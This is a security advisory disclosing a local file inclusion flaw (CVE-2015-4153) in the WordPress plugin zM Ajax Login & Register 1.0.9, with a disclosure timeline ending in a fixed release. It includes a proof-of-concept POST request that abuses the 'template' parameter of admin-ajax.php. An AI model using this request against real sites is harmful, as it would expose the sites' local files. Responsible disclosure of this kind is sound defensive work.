zM Ajax Login & Register [Local File Inclusion]

WordPress plugin zM Ajax Login & Register suffers for an Local File Inclusion vulnerability.

Description

Any authenticated or non-authenticated user can perform a local file inclusion attack by exploiting the wp_ajax_nopriv_load_template action. Plugin simply includes the file specified in ‘template’ POST parameter without any further validation.

Proof of Concept

Send a post request to

http://my.vulnerable.website.com/wp-admin/admin-ajax.php

with data:

action=load_template&template=[relative path to local file]&security=[wp nonce]&referer=[action from which the nonce came from]

---

WordPress Plugins Local File Inclusion LFI

---

INFO

• 1 June 2015
• Pan Vag
• zanematthew.com
• wordpress.org
• 1.0.9
• WordPress 4.2.2
• CVE-2015-4153

TIMELINE

• 2015-06-01:
  Discovered
• 2015-06-01:
  Vendor alerted via contact form at his website
• 2015-06-03:
  Vendor responded
• 2015-06-03:
  Released version 1.1.0 that resolves the issue